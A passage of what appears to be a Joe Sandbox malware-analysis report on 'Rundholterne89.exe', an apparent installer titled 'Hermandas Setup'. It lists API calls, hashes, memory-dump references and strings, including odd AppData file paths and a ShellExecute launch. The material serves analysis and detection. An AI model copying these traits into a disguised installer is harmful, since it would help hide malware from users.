• Associated: 00000000.00000002.1402530784.0000000000442000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402530784.0000000000446000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402530784.0000000000452000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Rundholterne89.jbxd
Similarity
• API ID: ByteCharCreateInstanceMultiWide
• String ID: C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian
• API String ID: 123533781-2640575136
• Opcode ID: b8ee83f4a2e520ff4dab12eb385b74956a589b44baa30f4280110cf77b52f418
• Instruction ID: 202bff00353f62e800299527826cf24c9a9ce8e01df6a73eade79aa1dd8fb932
• Opcode Fuzzy Hash: b8ee83f4a2e520ff4dab12eb385b74956a589b44baa30f4280110cf77b52f418
• Instruction Fuzzy Hash: 16512775A00208BFCF10DFA4CD88A9DBBB5BF48318F20856AF615EB2D1DA799941CB14
Memory Dump Source
• Source File: 00000000.00000002.1402358709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1402334549.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402388682.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402408602.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402408602.000000000042B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402408602.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402408602.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402408602.0000000000440000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402530784.0000000000442000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402530784.0000000000446000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402530784.0000000000452000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Rundholterne89.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e604220aa4cc57a0d507a3eee92e1260e78aef2c865a073fe0bf8dde490b4c6a
• Instruction ID: 52966d4a0c143cd855de3d8d32e2f948802446bd43c2bd9d1e79afe7cfa9a62c
• Opcode Fuzzy Hash: e604220aa4cc57a0d507a3eee92e1260e78aef2c865a073fe0bf8dde490b4c6a
• Instruction Fuzzy Hash: D1E19B71901709DFDB24CF58C890BAABBF5FB44305F15882EE497A72D1D378AA91CB14
Memory Dump Source
• Source File: 00000000.00000002.1402358709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1402334549.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402388682.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402408602.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402408602.000000000042B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402408602.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402408602.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402408602.0000000000440000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402530784.0000000000442000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402530784.0000000000446000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402530784.0000000000452000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Rundholterne89.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c5f7cd6dd9e448d1ceba1cbc86ba17909bb361cdcfc346b133718b62247df967
• Instruction ID: 28dd1b742c6822d911ebb92dd847779981f1f79bff0408386317dd500df5852d
• Opcode Fuzzy Hash: c5f7cd6dd9e448d1ceba1cbc86ba17909bb361cdcfc346b133718b62247df967
• Instruction Fuzzy Hash: 53C12971A0021A8BCF18CF68D5905EEB7B2FF99314F26827AD85677380D734A952CF94
APIs
• CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 004040E8
• GetDlgItem.USER32(00000000,000003E8), ref: 004040FC
• SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 0040411A
• GetSysColor.USER32(?), ref: 0040412B
• SendMessageA.USER32(00000000,00000443,00000000,?), ref: 0040413A
• SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404149
• lstrlenA.KERNEL32(?), ref: 0040414C
• SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 0040415B
• SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00404170
• GetDlgItem.USER32(?,0000040A), ref: 004041D2
• SendMessageA.USER32(00000000), ref: 004041D5
• GetDlgItem.USER32(?,000003E8), ref: 00404200
• SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 00404240
• LoadCursorA.USER32(00000000,00007F02), ref: 0040424F
• SetCursor.USER32(00000000), ref: 00404258
• ShellExecuteA.SHELL32(0000070B,open,0042D3A0,00000000,00000000,00000001), ref: 0040426B
• LoadCursorA.USER32(00000000,00007F00), ref: 00404278
• SetCursor.USER32(00000000), ref: 0040427B
• SendMessageA.USER32(00000111,00000001,00000000), ref: 004042A7
• SendMessageA.USER32(00000010,00000000,00000000), ref: 004042BB
Strings
Memory Dump Source
• Source File: 00000000.00000002.1402358709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1402334549.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402388682.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402408602.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402408602.000000000042B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402408602.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402408602.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402408602.0000000000440000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402530784.0000000000442000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402530784.0000000000446000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402530784.0000000000452000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Rundholterne89.jbxd
Similarity
• API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
• String ID: (@@$C:\Users\user\Stanglorgnet.bro$N$open
• API String ID: 3615053054-3917213246
• Opcode ID: 7868d9df4ae1d674ab0cf3f1043cffc922edae777938ca354114bc27cd0f8479
• Instruction ID: c92d02d703ef172067c6e48558b1c194508f37b8d1d7228abd04d5231d4a861f
• Opcode Fuzzy Hash: 7868d9df4ae1d674ab0cf3f1043cffc922edae777938ca354114bc27cd0f8479
• Instruction Fuzzy Hash: 5461D3B1A40209BFEB109F21DC45F6A7B68FB44755F10807AFB00BA2D1C7B8A951CB98
APIs
• DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
• BeginPaint.USER32(?,?), ref: 00401047
• GetClientRect.USER32(?,?), ref: 0040105B
• CreateBrushIndirect.GDI32(00000000), ref: 004010CF
• FillRect.USER32(00000000,?,00000000), ref: 004010E4
• DeleteObject.GDI32(?), ref: 004010ED
• CreateFontIndirectA.GDI32(?), ref: 00401105
• SetBkMode.GDI32(00000000,00000001), ref: 00401126
• SetTextColor.GDI32(00000000,000000FF), ref: 00401130
• SelectObject.GDI32(00000000,?), ref: 00401140
• DrawTextA.USER32(00000000,Hermandas Setup,000000FF,00000010,00000820), ref: 00401156
• SelectObject.GDI32(00000000,00000000), ref: 00401160
• DeleteObject.GDI32(?), ref: 00401165
• EndPaint.USER32(?,?), ref: 0040116E
Strings
Memory Dump Source
• Source File: 00000000.00000002.1402358709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1402334549.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402388682.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402408602.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402408602.000000000042B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402408602.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402408602.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402408602.0000000000440000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402530784.0000000000442000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402530784.0000000000446000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402530784.0000000000452000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Rundholterne89.jbxd
Similarity
• API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
• String ID: F$Hermandas Setup
• API String ID: 941294808-715303475
• Opcode ID: 743dd018db8a108fdfb55826faff2fb237305abb1c3a72422579a1c27d61dc24
• Instruction ID: 9af9226455e7fa8211e54ab4aa6b8deb1f4adf461e7c9b231a43246ca388c9df
• Opcode Fuzzy Hash: 743dd018db8a108fdfb55826faff2fb237305abb1c3a72422579a1c27d61dc24
• Instruction Fuzzy Hash: F0419B71804249AFCB058FA5CD459AFBBB9FF44310F00812AF961AA1A0C738EA51DFA5
APIs
• lstrcpyA.KERNEL32(0042B5F8,NUL,?,00000000,?,00000000,00405C0B,?,?), ref: 00405A87
• CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,00405C0B,?,?), ref: 00405AAB
• GetShortPathNameA.KERNEL32(?,0042B5F8,00000400), ref: 00405AB4
  • Part of subcall function 00405907: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405B64,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405917
  • Part of subcall function 00405907: lstrlenA.KERNEL32(00000000,?,00000000,00405B64,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405949
• GetShortPathNameA.KERNEL32(0042B9F8,0042B9F8,00000400), ref: 00405AD1
• wsprintfA.USER32 ref: 00405AEF
• GetFileSize.KERNEL32(00000000,00000000,0042B9F8,C0000000,00000004,0042B9F8,?,?,?,?,?), ref: 00405B2A
• GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405B39
• lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B71
• SetFilePointer.KERNEL32(004093B0,00000000,00000000,00000000,00000000,0042B1F8,00000000,-0000000A,004093B0,00000000,[Rename],00000000,00000000,00000000), ref: 00405BC7
• GlobalFree.KERNEL32(00000000), ref: 00405BD8
• CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405BDF
  • Part of subcall function 004059A2: GetFileAttributesA.KERNELBASE(00000003,00402CA6,C:\Users\user\Desktop\Rundholterne89.exe,80000000,00000003), ref: 004059A6
  • Part of subcall function 004059A2: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004059C8
Strings
Memory Dump Source
• Source File: 00000000.00000002.1402358709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1402334549.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402388682.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402408602.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402408602.000000000042B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402408602.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402408602.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402408602.0000000000440000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402530784.0000000000442000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402530784.0000000000446000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402530784.0000000000452000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Rundholterne89.jbxd
Similarity
• API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
• String ID: %s=%s$NUL$[Rename]
• API String ID: 222337774-4148678300
• Opcode ID: 1f98854de7e5c40725f23c70871346fb007f1980b568e50079ef848d7602898f
• Instruction ID: 8a014ae25a2f57f4e7f496887e8afb480c0f68f452f449b39f33bde68a4ee9be
• Opcode Fuzzy Hash: 1f98854de7e5c40725f23c70871346fb007f1980b568e50079ef848d7602898f
• Instruction Fuzzy Hash: 5231F370604B19ABC2206B615D49F6B3A6CDF45758F14053AFE01F62D2DA7CB800CEAD
                                                                                            APIs
                                                                                            • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Rundholterne89.exe",774D3410,C:\Users\user\AppData\Local\Temp\,00000000,004030EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00405FF2
                                                                                            • CharNextA.USER32(?,?,?,00000000), ref: 00405FFF
                                                                                            • CharNextA.USER32(?,"C:\Users\user\Desktop\Rundholterne89.exe",774D3410,C:\Users\user\AppData\Local\Temp\,00000000,004030EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00406004
                                                                                            • CharPrevA.USER32(?,?,774D3410,C:\Users\user\AppData\Local\Temp\,00000000,004030EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00406014
                                                                                            Strings
                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405F9B
                                                                                            • *?|<>/":, xrefs: 00405FE2
                                                                                            • "C:\Users\user\Desktop\Rundholterne89.exe", xrefs: 00405FD6
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1402358709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Rundholterne89.jbxd
                                                                                            Similarity
                                                                                            • API ID: Char$Next$Prev
                                                                                            • String ID: "C:\Users\user\Desktop\Rundholterne89.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                            • API String ID: 589700163-2912927711
                                                                                            • Opcode ID: ce3d7990729f771fdc32bb0ed1b54e2c2469674ae1568702cd8079844570f2a1
                                                                                            • Instruction ID: 57e0f34d942670e43035b7c22e392f1a12bb14715b301cf1348a0c798ab9ef07
                                                                                            • Opcode Fuzzy Hash: ce3d7990729f771fdc32bb0ed1b54e2c2469674ae1568702cd8079844570f2a1
                                                                                            • Instruction Fuzzy Hash: 8B112751809B932AFB3256244C00B7BBFD88F57760F19007BE8D5722C2D67C5D529B6D
                                                                                            APIs
                                                                                            • GetWindowLongA.USER32(?,000000EB), ref: 00403F98
                                                                                            • GetSysColor.USER32(00000000), ref: 00403FB4
                                                                                            • SetTextColor.GDI32(?,00000000), ref: 00403FC0
                                                                                            • SetBkMode.GDI32(?,?), ref: 00403FCC
                                                                                            • GetSysColor.USER32(?), ref: 00403FDF
                                                                                            • SetBkColor.GDI32(?,?), ref: 00403FEF
                                                                                            • DeleteObject.GDI32(?), ref: 00404009
                                                                                            • CreateBrushIndirect.GDI32(?), ref: 00404013
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1402358709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Rundholterne89.jbxd
                                                                                            Similarity
                                                                                            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                            • String ID:
                                                                                            • API String ID: 2320649405-0
                                                                                            • Opcode ID: e8c91e704ef8b2f1a11ad189bfd14f771d09f9d58710722270f9777396a44b4e
                                                                                            • Instruction ID: f3431a0ddd372d44177634c3e6640760e16b4c563197d04d055afd4279a4596b
                                                                                            • Opcode Fuzzy Hash: e8c91e704ef8b2f1a11ad189bfd14f771d09f9d58710722270f9777396a44b4e
                                                                                            • Instruction Fuzzy Hash: F4219F71808705ABCB209F78DD48A4BBBF8AF41704B048A2AE996F26E0C734E904CB55
                                                                                            APIs
                                                                                            • lstrlenA.KERNEL32(00429048,00000000,0041C205,774D23A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000,?), ref: 00404F81
                                                                                            • lstrlenA.KERNEL32(00402FFA,00429048,00000000,0041C205,774D23A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000), ref: 00404F91
                                                                                            • lstrcatA.KERNEL32(00429048,00402FFA,00402FFA,00429048,00000000,0041C205,774D23A0), ref: 00404FA4
                                                                                            • SetWindowTextA.USER32(00429048,00429048), ref: 00404FB6
                                                                                            • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FDC
                                                                                            • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FF6
                                                                                            • SendMessageA.USER32(?,00001013,?,00000000), ref: 00405004
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1402358709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Rundholterne89.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                            • String ID:
                                                                                            • API String ID: 2531174081-0
                                                                                            • Opcode ID: 534154c7e412c88fb75b9fbb21228ed2bc61e9f55108b0b726938b2d4222e579
                                                                                            • Instruction ID: 5247e829223e414f07dbea0a4ec6ac131d28d962b221907bbf4360a320382309
                                                                                            • Opcode Fuzzy Hash: 534154c7e412c88fb75b9fbb21228ed2bc61e9f55108b0b726938b2d4222e579
                                                                                            • Instruction Fuzzy Hash: 76218C71D00118BBDF219FA5DC84ADEBFA9EF08354F10807AF904B6291C7798E408FA8
                                                                                            APIs
                                                                                            • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 0040482E
                                                                                            • GetMessagePos.USER32 ref: 00404836
                                                                                            • ScreenToClient.USER32(?,?), ref: 00404850
                                                                                            • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404862
                                                                                            • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404888
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1402358709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Rundholterne89.jbxd
                                                                                            Similarity
                                                                                            • API ID: Message$Send$ClientScreen
                                                                                            • String ID: f
                                                                                            • API String ID: 41195575-1993550816
                                                                                            • Opcode ID: 13dcb630cae817d26763a7c5c34c1a537cec2b83c976c16d0abeb4614e4307e4
                                                                                            • Instruction ID: 72a6dff9965abeea3fde93c43f55bc8d1d0b984f63b53e8c81f3052648e7bb03
                                                                                            • Opcode Fuzzy Hash: 13dcb630cae817d26763a7c5c34c1a537cec2b83c976c16d0abeb4614e4307e4
                                                                                            • Instruction Fuzzy Hash: EC019275D00218BADB00DBA5DC41FFEBBBCAF45711F10412BBB10B61C0C7B4A5018BA5
                                                                                            APIs
                                                                                            • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B9A
                                                                                            • MulDiv.KERNEL32(000D9908,00000064,000D990C), ref: 00402BC5
                                                                                            • wsprintfA.USER32 ref: 00402BD5
                                                                                            • SetWindowTextA.USER32(?,?), ref: 00402BE5
                                                                                            • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402BF7
                                                                                            Strings
                                                                                            • verifying installer: %d%%, xrefs: 00402BCF
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1402358709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Rundholterne89.jbxd
                                                                                            Similarity
                                                                                            • API ID: Text$ItemTimerWindowwsprintf
                                                                                            • String ID: verifying installer: %d%%
                                                                                            • API String ID: 1451636040-82062127
                                                                                            • Opcode ID: f377c182e300eefdb83bb0ba9c57991093f425550345df3c4c3600326924e25d
                                                                                            • Instruction ID: f77185bba9c57e6aa61c0c8aee9f592e237af7c43fbef78eddb3d4185353df7a
                                                                                            • Opcode Fuzzy Hash: f377c182e300eefdb83bb0ba9c57991093f425550345df3c4c3600326924e25d
                                                                                            • Instruction Fuzzy Hash: D001F471640208BBEF209F60DD09EAE3779EB04744F008039FA16B51D1D7B5A955DB59
                                                                                            APIs
                                                                                            • RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00402A9B
                                                                                            • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402AD7
                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00402AE0
                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00402B05
                                                                                            • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402B23
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1402358709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Rundholterne89.jbxd
                                                                                            Similarity
                                                                                            • API ID: Close$DeleteEnumOpen
                                                                                            • String ID:
                                                                                            • API String ID: 1912718029-0
                                                                                            • Opcode ID: 7766ad722bcf743109a83c91df0766a7f4c549130a1e07b93abaa864288c9da4
                                                                                            • Instruction ID: e0b40e6d550d0c6dedecb0be42375ee7245bd63e637183e656586a56a8cfacd8
                                                                                            • Opcode Fuzzy Hash: 7766ad722bcf743109a83c91df0766a7f4c549130a1e07b93abaa864288c9da4
                                                                                            • Instruction Fuzzy Hash: 66116D31A00108FEDF22AF90DE89EAA3B7DEB54349B104436FA01B10E0D774AE51DB69
                                                                                            APIs
                                                                                            • GetDlgItem.USER32(?), ref: 00401CE2
                                                                                            • GetClientRect.USER32(00000000,?), ref: 00401CEF
                                                                                            • LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401D10
                                                                                            • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D1E
                                                                                            • DeleteObject.GDI32(00000000), ref: 00401D2D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1402358709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1402334549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402388682.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Rundholterne89.jbxd
Similarity
• API ID: ClientDeleteImageItemLoadMessageObjectRectSend
• String ID:
• API String ID: 1849352358-0
• Opcode ID: df9cc67d31b04cd6e9f5647a99bb7b911e6a77bbf16d980a5e8a288dfb7b3bdc
• Instruction ID: 718a49c372d49eeeb619100b459207f1cde729867d9d835a9e14b5832590348d
• Opcode Fuzzy Hash: df9cc67d31b04cd6e9f5647a99bb7b911e6a77bbf16d980a5e8a288dfb7b3bdc
• Instruction Fuzzy Hash: 74F0E7B2A04114AFEB01EBE4DE88DAFB7BDEB54305B10447AF602F6191C7749D018B79
APIs
• GetDC.USER32(?), ref: 00401D3B
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D48
• MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D57
• ReleaseDC.USER32(?,00000000), ref: 00401D68
• CreateFontIndirectA.GDI32(0040A818), ref: 00401DB3
Memory Dump Source
• Source File: 00000000.00000002.1402358709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true (associated dumps as listed above)
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Rundholterne89.jbxd
Similarity
• API ID: CapsCreateDeviceFontIndirectRelease
• String ID:
• API String ID: 3808545654-0
• Opcode ID: c2a9d05608db3b551cbe7321e8fd88224b197bc40f94a71f0fff53b7c1922a27
• Instruction ID: ad7d238852a8d87b5aaa3e6a204337ae93e1cce4a0b470fbec170e72a625d374
• Opcode Fuzzy Hash: c2a9d05608db3b551cbe7321e8fd88224b197bc40f94a71f0fff53b7c1922a27
• Instruction Fuzzy Hash: EA01D632944340AFEB0177B0AE4EBAA3FB49759309F108479F201B62E2C6790052CF6F
APIs
• lstrlenA.KERNEL32(00429868,00429868,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404624,000000DF,00000000,00000400,?), ref: 004047A7
• wsprintfA.USER32 ref: 004047AF
• SetDlgItemTextA.USER32(?,00429868), ref: 004047C2
Strings
Memory Dump Source
• Source File: 00000000.00000002.1402358709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true (associated dumps as listed above)
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Rundholterne89.jbxd
Similarity
• API ID: ItemTextlstrlenwsprintf
• String ID: %u.%u%s%s
• API String ID: 3540041739-3551169577
• Opcode ID: 1472cf9e36570b38fa99e832c46bb30f5d20a58f0764e004e3f2a6e79c89f0d0
• Instruction ID: 053aaa49463ee093dad042f908cd6657d31450f6c5b0c7846562dfb37f065ee1
• Opcode Fuzzy Hash: 1472cf9e36570b38fa99e832c46bb30f5d20a58f0764e004e3f2a6e79c89f0d0
• Instruction Fuzzy Hash: 0E11E473A041283BDB0065A99C45EAF3288DB82374F254237FA25F71D1EA78CC1286A8
APIs
• SetWindowTextA.USER32(00000000,Hermandas Setup), ref: 00403A0C
Strings
Memory Dump Source
• Source File: 00000000.00000002.1402358709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true (associated dumps as listed above)
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Rundholterne89.jbxd
Similarity
• API ID: TextWindow
• String ID: "C:\Users\user\Desktop\Rundholterne89.exe"$1033$Hermandas Setup
• API String ID: 530164218-3196150966
• Opcode ID: c35f14d8ae607f964b1d366d12cd70842dee39e56cae11f13a59ba4c30930c7f
• Instruction ID: fbf6035dbb292e76ee93bcdc762ea67a79fb5cde0254510f453a1e05a67cff09
• Opcode Fuzzy Hash: c35f14d8ae607f964b1d366d12cd70842dee39e56cae11f13a59ba4c30930c7f
• Instruction Fuzzy Hash: 97110871B046109BC730AF56DC409737B6CEF89319368423FE801A73D1D639AD03CAA9
APIs
• lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004030FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 004057A7
• CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004030FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 004057B0
• lstrcatA.KERNEL32(?,00409014), ref: 004057C1
Strings
• C:\Users\user\AppData\Local\Temp\, xrefs: 004057A1
Memory Dump Source
• Source File: 00000000.00000002.1402358709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true (associated dumps as listed above)
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Rundholterne89.jbxd
Similarity
• API ID: CharPrevlstrcatlstrlen
• String ID: C:\Users\user\AppData\Local\Temp\
• API String ID: 2659869361-2145255484
• Opcode ID: 39623dee3265ed167cf4eb0d952b1efefe5673d98ca6e2622bb109ae9f6b3ea7
• Instruction ID: 31daa9478c60f2ec517fa6cf0afa0cd81b34b06dfe81de980877f4a94ee531a8
